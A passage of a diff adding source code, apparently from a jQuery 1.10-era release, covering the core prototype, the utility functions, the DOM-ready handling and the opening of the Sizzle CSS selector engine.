+	rvalidbraces = /(?:^|:|,)(?:\s*\[)+/g,
+	rvalidescape = /\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,
+	rvalidtokens = /"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,
+
+	// Matches dashed string for camelizing
+	rmsPrefix = /^-ms-/,
+	rdashAlpha = /-([\da-z])/gi,
+
+	// Used by jQuery.camelCase as callback to replace()
+	fcamelCase = function( all, letter ) {
+		return letter.toUpperCase();
+	},
+
+	// The ready event handler
+	completed = function( event ) {
+
+		// readyState === "complete" is good enough for us to call the dom ready in oldIE
+		if ( document.addEventListener || event.type === "load" || document.readyState === "complete" ) {
+			detach();
+			jQuery.ready();
+		}
+	},
+	// Clean-up method for dom ready events
+	detach = function() {
+		if ( document.addEventListener ) {
+			document.removeEventListener( "DOMContentLoaded", completed, false );
+			window.removeEventListener( "load", completed, false );
+
+		} else {
+			document.detachEvent( "onreadystatechange", completed );
+			window.detachEvent( "onload", completed );
+		}
+	};
+
+jQuery.fn = jQuery.prototype = {
+	// The current version of jQuery being used
+	jquery: core_version,
+
+	constructor: jQuery,
+	init: function( selector, context, rootjQuery ) {
+		var match, elem;
+
+		// HANDLE: $(""), $(null), $(undefined), $(false)
+		if ( !selector ) {
+			return this;
+		}
+
+		// Handle HTML strings
+		if ( typeof selector === "string" ) {
+			if ( selector.charAt(0) === "<" && selector.charAt( selector.length - 1 ) === ">" && selector.length >= 3 ) {
+				// Assume that strings that start and end with <> are HTML and skip the regex check
+				match = [ null, selector, null ];
+
+			} else {
+				match = rquickExpr.exec( selector );
+			}
+
+			// Match html or make sure no context is specified for #id
+			if ( match && (match[1] || !context) ) {
+
+				// HANDLE: $(html) -> $(array)
+				if ( match[1] ) {
+					context = context instanceof jQuery ? context[0] : context;
+
+					// scripts is true for back-compat
+					jQuery.merge( this, jQuery.parseHTML(
+						match[1],
+						context && context.nodeType ? context.ownerDocument || context : document,
+						true
+					) );
+
+					// HANDLE: $(html, props)
+					if ( rsingleTag.test( match[1] ) && jQuery.isPlainObject( context ) ) {
+						for ( match in context ) {
+							// Properties of context are called as methods if possible
+							if ( jQuery.isFunction( this[ match ] ) ) {
+								this[ match ]( context[ match ] );
+
+							// ...and otherwise set as attributes
+							} else {
+								this.attr( match, context[ match ] );
+							}
+						}
+					}
+
+					return this;
+
+				// HANDLE: $(#id)
+				} else {
+					elem = document.getElementById( match[2] );
+
+					// Check parentNode to catch when Blackberry 4.6 returns
+					// nodes that are no longer in the document #6963
+					if ( elem && elem.parentNode ) {
+						// Handle the case where IE and Opera return items
+						// by name instead of ID
+						if ( elem.id !== match[2] ) {
+							return rootjQuery.find( selector );
+						}
+
+						// Otherwise, we inject the element directly into the jQuery object
+						this.length = 1;
+						this[0] = elem;
+					}
+
+					this.context = document;
+					this.selector = selector;
+					return this;
+				}
+
+			// HANDLE: $(expr, $(...))
+			} else if ( !context || context.jquery ) {
+				return ( context || rootjQuery ).find( selector );
+
+			// HANDLE: $(expr, context)
+			// (which is just equivalent to: $(context).find(expr)
+			} else {
+				return this.constructor( context ).find( selector );
+			}
+
+		// HANDLE: $(DOMElement)
+		} else if ( selector.nodeType ) {
+			this.context = this[0] = selector;
+			this.length = 1;
+			return this;
+
+		// HANDLE: $(function)
+		// Shortcut for document ready
+		} else if ( jQuery.isFunction( selector ) ) {
+			return rootjQuery.ready( selector );
+		}
+
+		if ( selector.selector !== undefined ) {
+			this.selector = selector.selector;
+			this.context = selector.context;
+		}
+
+		return jQuery.makeArray( selector, this );
+	},
+
+	// Start with an empty selector
+	selector: "",
+
+	// The default length of a jQuery object is 0
+	length: 0,
+
+	toArray: function() {
+		return core_slice.call( this );
+	},
+
+	// Get the Nth element in the matched element set OR
+	// Get the whole matched element set as a clean array
+	get: function( num ) {
+		return num == null ?
+
+			// Return a 'clean' array
+			this.toArray() :
+
+			// Return just the object
+			( num < 0 ? this[ this.length + num ] : this[ num ] );
+	},
+
+	// Take an array of elements and push it onto the stack
+	// (returning the new matched element set)
+	pushStack: function( elems ) {
+
+		// Build a new jQuery matched element set
+		var ret = jQuery.merge( this.constructor(), elems );
+
+		// Add the old object onto the stack (as a reference)
+		ret.prevObject = this;
+		ret.context = this.context;
+
+		// Return the newly-formed element set
+		return ret;
+	},
+
+	// Execute a callback for every element in the matched set.
+	// (You can seed the arguments with an array of args, but this is
+	// only used internally.)
+	each: function( callback, args ) {
+		return jQuery.each( this, callback, args );
+	},
+
+	ready: function( fn ) {
+		// Add the callback
+		jQuery.ready.promise().done( fn );
+
+		return this;
+	},
+
+	slice: function() {
+		return this.pushStack( core_slice.apply( this, arguments ) );
+	},
+
+	first: function() {
+		return this.eq( 0 );
+	},
+
+	last: function() {
+		return this.eq( -1 );
+	},
+
+	eq: function( i ) {
+		var len = this.length,
+			j = +i + ( i < 0 ? len : 0 );
+		return this.pushStack( j >= 0 && j < len ? [ this[j] ] : [] );
+	},
+
+	map: function( callback ) {
+		return this.pushStack( jQuery.map(this, function( elem, i ) {
+			return callback.call( elem, i, elem );
+		}));
+	},
+
+	end: function() {
+		return this.prevObject || this.constructor(null);
+	},
+
+	// For internal use only.
+	// Behaves like an Array's method, not like a jQuery method.
+	push: core_push,
+	sort: [].sort,
+	splice: [].splice
+};
+
+// Give the init function the jQuery prototype for later instantiation
+jQuery.fn.init.prototype = jQuery.fn;
+
+jQuery.extend = jQuery.fn.extend = function() {
+	var src, copyIsArray, copy, name, options, clone,
+		target = arguments[0] || {},
+		i = 1,
+		length = arguments.length,
+		deep = false;
+
+	// Handle a deep copy situation
+	if ( typeof target === "boolean" ) {
+		deep = target;
+		target = arguments[1] || {};
+		// skip the boolean and the target
+		i = 2;
+	}
+
+	// Handle case when target is a string or something (possible in deep copy)
+	if ( typeof target !== "object" && !jQuery.isFunction(target) ) {
+		target = {};
+	}
+
+	// extend jQuery itself if only one argument is passed
+	if ( length === i ) {
+		target = this;
+		--i;
+	}
+
+	for ( ; i < length; i++ ) {
+		// Only deal with non-null/undefined values
+		if ( (options = arguments[ i ]) != null ) {
+			// Extend the base object
+			for ( name in options ) {
+				src = target[ name ];
+				copy = options[ name ];
+
+				// Prevent never-ending loop
+				if ( target === copy ) {
+					continue;
+				}
+
+				// Recurse if we're merging plain objects or arrays
+				if ( deep && copy && ( jQuery.isPlainObject(copy) || (copyIsArray = jQuery.isArray(copy)) ) ) {
+					if ( copyIsArray ) {
+						copyIsArray = false;
+						clone = src && jQuery.isArray(src) ? src : [];
+
+					} else {
+						clone = src && jQuery.isPlainObject(src) ? src : {};
+					}
+
+					// Never move original objects, clone them
+					target[ name ] = jQuery.extend( deep, clone, copy );
+
+				// Don't bring in undefined values
+				} else if ( copy !== undefined ) {
+					target[ name ] = copy;
+				}
+			}
+		}
+	}
+
+	// Return the modified object
+	return target;
+};
+
+jQuery.extend({
+	// Unique for each copy of jQuery on the page
+	// Non-digits removed to match rinlinejQuery
+	expando: "jQuery" + ( core_version + Math.random() ).replace( /\D/g, "" ),
+
+	noConflict: function( deep ) {
+		if ( window.$ === jQuery ) {
+			window.$ = _$;
+		}
+
+		if ( deep && window.jQuery === jQuery ) {
+			window.jQuery = _jQuery;
+		}
+
+		return jQuery;
+	},
+
+	// Is the DOM ready to be used? Set to true once it occurs.
+	isReady: false,
+
+	// A counter to track how many items to wait for before
+	// the ready event fires. See #6781
+	readyWait: 1,
+
+	// Hold (or release) the ready event
+	holdReady: function( hold ) {
+		if ( hold ) {
+			jQuery.readyWait++;
+		} else {
+			jQuery.ready( true );
+		}
+	},
+
+	// Handle when the DOM is ready
+	ready: function( wait ) {
+
+		// Abort if there are pending holds or we're already ready
+		if ( wait === true ? --jQuery.readyWait : jQuery.isReady ) {
+			return;
+		}
+
+		// Make sure body exists, at least, in case IE gets a little overzealous (ticket #5443).
+		if ( !document.body ) {
+			return setTimeout( jQuery.ready );
+		}
+
+		// Remember that the DOM is ready
+		jQuery.isReady = true;
+
+		// If a normal DOM Ready event fired, decrement, and wait if need be
+		if ( wait !== true && --jQuery.readyWait > 0 ) {
+			return;
+		}
+
+		// If there are functions bound, to execute
+		readyList.resolveWith( document, [ jQuery ] );
+
+		// Trigger any bound ready events
+		if ( jQuery.fn.trigger ) {
+			jQuery( document ).trigger("ready").off("ready");
+		}
+	},
+
+	// See test/unit/core.js for details concerning isFunction.
+	// Since version 1.3, DOM methods and functions like alert
+	// aren't supported. They return false on IE (#2968).
+	isFunction: function( obj ) {
+		return jQuery.type(obj) === "function";
+	},
+
+	isArray: Array.isArray || function( obj ) {
+		return jQuery.type(obj) === "array";
+	},
+
+	isWindow: function( obj ) {
+		/* jshint eqeqeq: false */
+		return obj != null && obj == obj.window;
+	},
+
+	isNumeric: function( obj ) {
+		return !isNaN( parseFloat(obj) ) && isFinite( obj );
+	},
+
+	type: function( obj ) {
+		if ( obj == null ) {
+			return String( obj );
+		}
+		return typeof obj === "object" || typeof obj === "function" ?
+			class2type[ core_toString.call(obj) ] || "object" :
+			typeof obj;
+	},
+
+	isPlainObject: function( obj ) {
+		var key;
+
+		// Must be an Object.
+		// Because of IE, we also have to check the presence of the constructor property.
+		// Make sure that DOM nodes and window objects don't pass through, as well
+		if ( !obj || jQuery.type(obj) !== "object" || obj.nodeType || jQuery.isWindow( obj ) ) {
+			return false;
+		}
+
+		try {
+			// Not own constructor property must be Object
+			if ( obj.constructor &&
+				!core_hasOwn.call(obj, "constructor") &&
+				!core_hasOwn.call(obj.constructor.prototype, "isPrototypeOf") ) {
+				return false;
+			}
+		} catch ( e ) {
+			// IE8,9 Will throw exceptions on certain host objects #9897
+			return false;
+		}
+
+		// Support: IE<9
+		// Handle iteration over inherited properties before own properties.
+		if ( jQuery.support.ownLast ) {
+			for ( key in obj ) {
+				return core_hasOwn.call( obj, key );
+			}
+		}
+
+		// Own properties are enumerated firstly, so to speed up,
+		// if last one is own, then all properties are own.
+		for ( key in obj ) {}
+
+		return key === undefined || core_hasOwn.call( obj, key );
+	},
+
+	isEmptyObject: function( obj ) {
+		var name;
+		for ( name in obj ) {
+			return false;
+		}
+		return true;
+	},
+
+	error: function( msg ) {
+		throw new Error( msg );
+	},
+
+	// data: string of html
+	// context (optional): If specified, the fragment will be created in this context, defaults to document
+	// keepScripts (optional): If true, will include scripts passed in the html string
+	parseHTML: function( data, context, keepScripts ) {
+		if ( !data || typeof data !== "string" ) {
+			return null;
+		}
+		if ( typeof context === "boolean" ) {
+			keepScripts = context;
+			context = false;
+		}
+		context = context || document;
+
+		var parsed = rsingleTag.exec( data ),
+			scripts = !keepScripts && [];
+
+		// Single tag
+		if ( parsed ) {
+			return [ context.createElement( parsed[1] ) ];
+		}
+
+		parsed = jQuery.buildFragment( [ data ], context, scripts );
+		if ( scripts ) {
+			jQuery( scripts ).remove();
+		}
+		return jQuery.merge( [], parsed.childNodes );
+	},
+
+	parseJSON: function( data ) {
+		// Attempt to parse using the native JSON parser first
+		if ( window.JSON && window.JSON.parse ) {
+			return window.JSON.parse( data );
+		}
+
+		if ( data === null ) {
+			return data;
+		}
+
+		if ( typeof data === "string" ) {
+
+			// Make sure leading/trailing whitespace is removed (IE can't handle it)
+			data = jQuery.trim( data );
+
+			if ( data ) {
+				// Make sure the incoming data is actual JSON
+				// Logic borrowed from http://json.org/json2.js
+				if ( rvalidchars.test( data.replace( rvalidescape, "@" )
+					.replace( rvalidtokens, "]" )
+					.replace( rvalidbraces, "")) ) {
+
+					return ( new Function( "return " + data ) )();
+				}
+			}
+		}
+
+		jQuery.error( "Invalid JSON: " + data );
+	},
+
+	// Cross-browser xml parsing
+	parseXML: function( data ) {
+		var xml, tmp;
+		if ( !data || typeof data !== "string" ) {
+			return null;
+		}
+		try {
+			if ( window.DOMParser ) { // Standard
+				tmp = new DOMParser();
+				xml = tmp.parseFromString( data , "text/xml" );
+			} else { // IE
+				xml = new ActiveXObject( "Microsoft.XMLDOM" );
+				xml.async = "false";
+				xml.loadXML( data );
+			}
+		} catch( e ) {
+			xml = undefined;
+		}
+		if ( !xml || !xml.documentElement || xml.getElementsByTagName( "parsererror" ).length ) {
+			jQuery.error( "Invalid XML: " + data );
+		}
+		return xml;
+	},
+
+	noop: function() {},
+
+	// Evaluates a script in a global context
+	// Workarounds based on findings by Jim Driscoll
+	// http://weblogs.java.net/blog/driscoll/archive/2009/09/08/eval-javascript-global-context
+	globalEval: function( data ) {
+		if ( data && jQuery.trim( data ) ) {
+			// We use execScript on Internet Explorer
+			// We use an anonymous function so that context is window
+			// rather than jQuery in Firefox
+			( window.execScript || function( data ) {
+				window[ "eval" ].call( window, data );
+			} )( data );
+		}
+	},
+
+	// Convert dashed to camelCase; used by the css and data modules
+	// Microsoft forgot to hump their vendor prefix (#9572)
+	camelCase: function( string ) {
+		return string.replace( rmsPrefix, "ms-" ).replace( rdashAlpha, fcamelCase );
+	},
+
+	nodeName: function( elem, name ) {
+		return elem.nodeName && elem.nodeName.toLowerCase() === name.toLowerCase();
+	},
+
+	// args is for internal usage only
+	each: function( obj, callback, args ) {
+		var value,
+			i = 0,
+			length = obj.length,
+			isArray = isArraylike( obj );
+
+		if ( args ) {
+			if ( isArray ) {
+				for ( ; i < length; i++ ) {
+					value = callback.apply( obj[ i ], args );
+
+					if ( value === false ) {
+						break;
+					}
+				}
+			} else {
+				for ( i in obj ) {
+					value = callback.apply( obj[ i ], args );
+
+					if ( value === false ) {
+						break;
+					}
+				}
+			}
+
+		// A special, fast, case for the most common use of each
+		} else {
+			if ( isArray ) {
+				for ( ; i < length; i++ ) {
+					value = callback.call( obj[ i ], i, obj[ i ] );
+
+					if ( value === false ) {
+						break;
+					}
+				}
+			} else {
+				for ( i in obj ) {
+					value = callback.call( obj[ i ], i, obj[ i ] );
+
+					if ( value === false ) {
+						break;
+					}
+				}
+			}
+		}
+
+		return obj;
+	},
+
+	// Use native String.trim function wherever possible
+	trim: core_trim && !core_trim.call("\uFEFF\xA0") ?
+		function( text ) {
+			return text == null ?
+				"" :
+				core_trim.call( text );
+		} :
+
+		// Otherwise use our own trimming functionality
+		function( text ) {
+			return text == null ?
+				"" :
+				( text + "" ).replace( rtrim, "" );
+		},
+
+	// results is for internal usage only
+	makeArray: function( arr, results ) {
+		var ret = results || [];
+
+		if ( arr != null ) {
+			if ( isArraylike( Object(arr) ) ) {
+				jQuery.merge( ret,
+					typeof arr === "string" ?
+					[ arr ] : arr
+				);
+			} else {
+				core_push.call( ret, arr );
+			}
+		}
+
+		return ret;
+	},
+
+	inArray: function( elem, arr, i ) {
+		var len;
+
+		if ( arr ) {
+			if ( core_indexOf ) {
+				return core_indexOf.call( arr, elem, i );
+			}
+
+			len = arr.length;
+			i = i ? i < 0 ? Math.max( 0, len + i ) : i : 0;
+
+			for ( ; i < len; i++ ) {
+				// Skip accessing in sparse arrays
+				if ( i in arr && arr[ i ] === elem ) {
+					return i;
+				}
+			}
+		}
+
+		return -1;
+	},
+
+	merge: function( first, second ) {
+		var l = second.length,
+			i = first.length,
+			j = 0;
+
+		if ( typeof l === "number" ) {
+			for ( ; j < l; j++ ) {
+				first[ i++ ] = second[ j ];
+			}
+		} else {
+			while ( second[j] !== undefined ) {
+				first[ i++ ] = second[ j++ ];
+			}
+		}
+
+		first.length = i;
+
+		return first;
+	},
+
+	grep: function( elems, callback, inv ) {
+		var retVal,
+			ret = [],
+			i = 0,
+			length = elems.length;
+		inv = !!inv;
+
+		// Go through the array, only saving the items
+		// that pass the validator function
+		for ( ; i < length; i++ ) {
+			retVal = !!callback( elems[ i ], i );
+			if ( inv !== retVal ) {
+				ret.push( elems[ i ] );
+			}
+		}
+
+		return ret;
+	},
+
+	// arg is for internal usage only
+	map: function( elems, callback, arg ) {
+		var value,
+			i = 0,
+			length = elems.length,
+			isArray = isArraylike( elems ),
+			ret = [];
+
+		// Go through the array, translating each of the items to their
+		if ( isArray ) {
+			for ( ; i < length; i++ ) {
+				value = callback( elems[ i ], i, arg );
+
+				if ( value != null ) {
+					ret[ ret.length ] = value;
+				}
+			}
+
+		// Go through every key on the object,
+		} else {
+			for ( i in elems ) {
+				value = callback( elems[ i ], i, arg );
+
+				if ( value != null ) {
+					ret[ ret.length ] = value;
+				}
+			}
+		}
+
+		// Flatten any nested arrays
+		return core_concat.apply( [], ret );
+	},
+
+	// A global GUID counter for objects
+	guid: 1,
+
+	// Bind a function to a context, optionally partially applying any
+	// arguments.
+	proxy: function( fn, context ) {
+		var args, proxy, tmp;
+
+		if ( typeof context === "string" ) {
+			tmp = fn[ context ];
+			context = fn;
+			fn = tmp;
+		}
+
+		// Quick check to determine if target is callable, in the spec
+		// this throws a TypeError, but we will just return undefined.
+		if ( !jQuery.isFunction( fn ) ) {
+			return undefined;
+		}
+
+		// Simulated bind
+		args = core_slice.call( arguments, 2 );
+		proxy = function() {
+			return fn.apply( context || this, args.concat( core_slice.call( arguments ) ) );
+		};
+
+		// Set the guid of unique handler to the same of original handler, so it can be removed
+		proxy.guid = fn.guid = fn.guid || jQuery.guid++;
+
+		return proxy;
+	},
+
+	// Multifunctional method to get and set values of a collection
+	// The value/s can optionally be executed if it's a function
+	access: function( elems, fn, key, value, chainable, emptyGet, raw ) {
+		var i = 0,
+			length = elems.length,
+			bulk = key == null;
+
+		// Sets many values
+		if ( jQuery.type( key ) === "object" ) {
+			chainable = true;
+			for ( i in key ) {
+				jQuery.access( elems, fn, i, key[i], true, emptyGet, raw );
+			}
+
+		// Sets one value
+		} else if ( value !== undefined ) {
+			chainable = true;
+
+			if ( !jQuery.isFunction( value ) ) {
+				raw = true;
+			}
+
+			if ( bulk ) {
+				// Bulk operations run against the entire set
+				if ( raw ) {
+					fn.call( elems, value );
+					fn = null;
+
+				// ...except when executing function values
+				} else {
+					bulk = fn;
+					fn = function( elem, key, value ) {
+						return bulk.call( jQuery( elem ), value );
+					};
+				}
+			}
+
+			if ( fn ) {
+				for ( ; i < length; i++ ) {
+					fn( elems[i], key, raw ? value : value.call( elems[i], i, fn( elems[i], key ) ) );
+				}
+			}
+		}
+
+		return chainable ?
+			elems :
+
+			// Gets
+			bulk ?
+				fn.call( elems ) :
+				length ? fn( elems[0], key ) : emptyGet;
+	},
+
+	now: function() {
+		return ( new Date() ).getTime();
+	},
+
+	// A method for quickly swapping in/out CSS properties to get correct calculations.
+	// Note: this method belongs to the css module but it's needed here for the support module.
+	// If support gets modularized, this method should be moved back to the css module.
+	swap: function( elem, options, callback, args ) {
+		var ret, name,
+			old = {};
+
+		// Remember the old values, and insert the new ones
+		for ( name in options ) {
+			old[ name ] = elem.style[ name ];
+			elem.style[ name ] = options[ name ];
+		}
+
+		ret = callback.apply( elem, args || [] );
+
+		// Revert the old values
+		for ( name in options ) {
+			elem.style[ name ] = old[ name ];
+		}
+
+		return ret;
+	}
+});
+
+jQuery.ready.promise = function( obj ) {
+	if ( !readyList ) {
+
+		readyList = jQuery.Deferred();
+
+		// Catch cases where $(document).ready() is called after the browser event has already occurred.
+		// we once tried to use readyState "interactive" here, but it caused issues like the one
+		// discovered by ChrisS here: http://bugs.jquery.com/ticket/12282#comment:15
+		if ( document.readyState === "complete" ) {
+			// Handle it asynchronously to allow scripts the opportunity to delay ready
+			setTimeout( jQuery.ready );
+
+		// Standards-based browsers support DOMContentLoaded
+		} else if ( document.addEventListener ) {
+			// Use the handy event callback
+			document.addEventListener( "DOMContentLoaded", completed, false );
+
+			// A fallback to window.onload, that will always work
+			window.addEventListener( "load", completed, false );
+
+		// If IE event model is used
+		} else {
+			// Ensure firing before onload, maybe late but safe also for iframes
+			document.attachEvent( "onreadystatechange", completed );
+
+			// A fallback to window.onload, that will always work
+			window.attachEvent( "onload", completed );
+
+			// If IE and not a frame
+			// continually check to see if the document is ready
+			var top = false;
+
+			try {
+				top = window.frameElement == null && document.documentElement;
+			} catch(e) {}
+
+			if ( top && top.doScroll ) {
+				(function doScrollCheck() {
+					if ( !jQuery.isReady ) {
+
+						try {
+							// Use the trick by Diego Perini
+							// http://javascript.nwbox.com/IEContentLoaded/
+							top.doScroll("left");
+						} catch(e) {
+							return setTimeout( doScrollCheck, 50 );
+						}
+
+						// detach all dom ready events
+						detach();
+
+						// and execute any waiting functions
+						jQuery.ready();
+					}
+				})();
+			}
+		}
+	}
+	return readyList.promise( obj );
+};
+
+// Populate the class2type map
+jQuery.each("Boolean Number String Function Array Date RegExp Object Error".split(" "), function(i, name) {
+	class2type[ "[object " + name + "]" ] = name.toLowerCase();
+});
+
+function isArraylike( obj ) {
+	var length = obj.length,
+		type = jQuery.type( obj );
+
+	if ( jQuery.isWindow( obj ) ) {
+		return false;
+	}
+
+	if ( obj.nodeType === 1 && length ) {
+		return true;
+	}
+
+	return type === "array" || type !== "function" &&
+		( length === 0 ||
+		typeof length === "number" && length > 0 && ( length - 1 ) in obj );
+}
+
+// All jQuery objects should point back to these
+rootjQuery = jQuery(document);
+/*!
+ * Sizzle CSS Selector Engine v1.10.2
+ * http://sizzlejs.com/
+ *
+ * Copyright 2013 jQuery Foundation, Inc. and other contributors
+ * Released under the MIT license
+ * http://jquery.org/license
+ *
+ * Date: 2013-07-03
+ */
+(function( window, undefined ) {
+
+var i,
+	support,
+	cachedruns,
+	Expr,
+	getText,
+	isXML,
+	compile,
+	outermostContext,
+	sortInput,
+
+	// Local document vars
+	setDocument,
+	document,
+	docElem,
+	documentIsHTML,
+	rbuggyQSA,
+	rbuggyMatches,
+	matches,
+	contains,
+
+	// Instance-specific data
+	expando = "sizzle" + -(new Date()),
+	preferredDoc = window.document,
+	dirruns = 0,
+	done = 0,
+	classCache = createCache(),
+	tokenCache = createCache(),
+	compilerCache = createCache(),
+	hasDuplicate = false,
+	sortOrder = function( a, b ) {
+		if ( a === b ) {
+			hasDuplicate = true;
+			return 0;
+		}
+		return 0;
+	},
+
+	// General-purpose constants
+	strundefined = typeof undefined,
+	MAX_NEGATIVE = 1 << 31,
+
+	// Instance methods
+	hasOwn = ({}).hasOwnProperty,
+	arr = [],
+	pop = arr.pop,
+	push_native = arr.push,
+	push = arr.push,
+	slice = arr.slice,
+	// Use a stripped-down indexOf if we can't use a native one
+	indexOf = arr.indexOf || function( elem ) {
+		var i = 0,
+			len = this.length;
+		for ( ; i < len; i++ ) {
+			if ( this[i] === elem ) {
+				return i;
+			}
+		}
+		return -1;
+	},
+
+	booleans = "checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",
+
+	// Regular expressions
+
+	// Whitespace characters http://www.w3.org/TR/css3-selectors/#whitespace
+	whitespace = "[\\x20\\t\\r\\n\\f]",
+	// http://www.w3.org/TR/css3-syntax/#characters
+	characterEncoding = "(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",
+
+	// Loosely modeled on CSS identifier characters
+	// An unquoted value should be a CSS identifier http://www.w3.org/TR/css3-selectors/#attribute-selectors
+	// Proper syntax: http://www.w3.org/TR/CSS21/syndata.html#value-def-identifier
+	identifier = characterEncoding.replace( "w", "w#" ),
+
+	// Acceptable operators http://www.w3.org/TR/selectors/#attribute-selectors
+	attributes = "\\[" + whitespace + "*(" + characterEncoding + ")" + whitespace +
+		"*(?:([*^$|!~]?=)" + whitespace + "*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|(" + identifier + ")|)|)" + whitespace + "*\\]",
+
+	// Prefer arguments quoted,
+	//   then not containing pseudos/brackets,
+	//   then attribute selectors/non-parenthetical expressions,
+	//   then anything else
+	// These preferences are here to reduce the number of selectors
+	//   needing tokenize in the PSEUDO preFilter
+	pseudos = ":(" + characterEncoding + ")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|" + attributes.replace( 3, 8 ) + ")*)|.*)\\)|)",
+
+	// Leading and non-escaped trailing whitespace, capturing some non-whitespace characters preceding the latter
+	rtrim = new RegExp( "^" + whitespace + "+|((?:^|[^\\\\])(?:\\\\.)*)" + whitespace + "+$", "g" ),
+
+	rcomma = new RegExp( "^" + whitespace + "*," + whitespace + "*" ),
+	rcombinators = new RegExp( "^" + whitespace + "*([>+~]|" + whitespace + ")" + whitespace + "*" ),
+
+	rsibling = new RegExp( whitespace + "*[+~]" ),
+	rattributeQuotes = new RegExp( "=" + whitespace + "*([^\\]'\"]*)" + whitespace + "*\\]", "g" ),
+
+	rpseudo = new RegExp( pseudos ),
+	ridentifier = new RegExp( "^" + identifier + "$" ),
+
+	matchExpr = {
+		"ID": new RegExp( "^#(" + characterEncoding + ")" ),
+		"CLASS": new RegExp( "^\\.(" + characterEncoding + ")" ),
+		"TAG": new RegExp( "^(" + characterEncoding.replace( "w", "w*" ) + ")" ),
+		"ATTR": new RegExp( "^" + attributes ),
+		"PSEUDO": new RegExp( "^" + pseudos ),
+		"CHILD": new RegExp( "^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + whitespace +
+			"*(even|odd|(([+-]|)(\\d*)n|)" + whitespace + "*(?:([+-]|)" + whitespace +
+			"*(\\d+)|))" + whitespace + "*\\)|)", "i" ),
+		"bool": new RegExp( "^(?:" + booleans + ")$", "i" ),
+		// For use in libraries implementing .is()
+		// We use this for POS matching in `select`
+		"needsContext": new RegExp( "^" + whitespace + "*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" +
+			whitespace + "*((?:-\\d)?\\d*)" + whitespace + "*\\)|)(?=[^-]|$)", "i" )
+	},
+
+	rnative = /^[^{]+\{\s*\[native \w/,
+
+	// Easily-parseable/retrievable ID or TAG or CLASS selectors
+	rquickExpr = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,
+
+	rinputs = /^(?:input|select|textarea|button)$/i,
+	rheader = /^h\d$/i,
+
+	rescape = /'|\\/g,
+
+	// CSS escapes http://www.w3.org/TR/CSS21/syndata.html#escaped-characters
+	runescape = new RegExp( "\\\\([\\da-f]{1,6}" + whitespace + "?|(" + whitespace + ")|.)", "ig" ),
+	funescape = function( _, escaped, escapedWhitespace ) {
+		var high = "0x" + escaped - 0x10000;
+		// NaN means non-codepoint
+		// Support: Firefox
+		// Workaround erroneous numeric interpretation of +"0x"
+		return high !== high || escapedWhitespace ?
+			escaped :
+			// BMP codepoint
+			high < 0 ?
+				String.fromCharCode( high + 0x10000 ) :
+				// Supplemental Plane codepoint (surrogate pair)
+				String.fromCharCode( high >> 10 | 0xD800, high & 0x3FF | 0xDC00 );
+	};
+
+// Optimize for push.apply( _, NodeList )
+try {
+	push.apply(
+		(arr = slice.call( preferredDoc.childNodes )),
+		preferredDoc.childNodes
+	);
+	// Support: Android<4.0
+	// Detect silently failing push.apply
+	arr[ preferredDoc.childNodes.length ].nodeType;
+} catch ( e ) {
+	push = { apply: arr.length ?
+
+		// Leverage slice if possible
+		function( target, els ) {
+			push_native.apply( target, slice.call(els) );
+		} :
+
+		// Support: IE<9
+		// Otherwise append directly
+		function( target, els ) {
+			var j = target.length,
+				i = 0;
+			// Can't trust NodeList.length
+			while ( (target[j++] = els[i++]) ) {}
+			target.length = j - 1;
+		}
+	};
+}
+
+function Sizzle( selector, context, results, seed ) {
+	var match, elem, m, nodeType,
+		// QSA vars
+		i, groups, old, nid, newContext, newSelector;
+
+	if ( ( context ? context.ownerDocument || context : preferredDoc ) !== document ) {
+		setDocument( context );
+	}
+
+	context = context || document;
+	results = results || [];
+
+	if ( !selector || typeof selector !== "string" ) {
+		return results;
+	}
+
+	if ( (nodeType = context.nodeType) !== 1 && nodeType !== 9 ) {
+		return [];
+	}
+
+	if ( documentIsHTML && !seed ) {
+
+		// Shortcuts
+		if ( (match = rquickExpr.exec( selector )) ) {
+			// Speed-up: Sizzle("#ID")
+			if ( (m = match[1]) ) {
+				if ( nodeType === 9 ) {
+					elem = context.getElementById( m );
+					// Check parentNode to catch when Blackberry 4.6 returns
+					// nodes that are no longer in the document #6963
+					if ( elem && elem.parentNode ) {
+						// Handle the case where IE, Opera, and Webkit return items
+						// by name instead of ID
+						if ( elem.id === m ) {
+							results.push( elem );
+							return results;
+						}
+					} else {
+						return results;
+					}
+				} else {
+					// Context is not a document
+					if ( context.ownerDocument && (elem = context.ownerDocument.getElementById( m )) &&
+						contains( context, elem ) && elem.id === m ) {
+						results.push( elem );
+						return results;
+					}
+				}
+
+			// Speed-up: Sizzle("TAG")
+			} else if ( match[2] ) {
+				push.apply( results, context.getElementsByTagName( selector ) );
+				return results;
+
+			// Speed-up: Sizzle(".CLASS")
+			} else if ( (m = match[3]) && support.getElementsByClassName && context.getElementsByClassName ) {
+				push.apply( results, context.getElementsByClassName( m ) );
+				return results;
+			}
+		}
+
+		// QSA path
+		if ( support.qsa && (!rbuggyQSA || !rbuggyQSA.test( selector )) ) {
+			nid = old = expando;
+			newContext = context;
+			newSelector = nodeType === 9 && selector;
+
+			// qSA works strangely on Element-rooted queries
+			// We can work around this by specifying an extra ID on the root
+			// and working up from there (Thanks to Andrew Dupont for the technique)
+			// IE 8 doesn't work on object elements
+			if ( nodeType === 1 && context.nodeName.toLowerCase() !== "object" ) {
+				groups = tokenize( selector );
+
+				if ( (old = context.getAttribute("id")) ) {
+					nid = old.replace( rescape, "\\$&" );
+				} else {
+					context.setAttribute( "id", nid );
+				}
+				nid = "[id='" + nid + "'] ";
+
+				i = groups.length;
+				while ( i-- ) {
+					groups[i] = nid + toSelector( groups[i] );
+				}
+				newContext = rsibling.test( selector ) && context.parentNode || context;
+				newSelector = groups.join(",");
+			}
+
+			if ( newSelector ) {
+				try {
+					push.apply( results,
+						newContext.querySelectorAll( newSelector )
+					);
+					return results;
+				} catch(qsaError) {
+				} finally {
+					if ( !old ) {
+						context.removeAttribute("id");
+					}
+				}
+			}
+		}
+	}
+
+	// All others
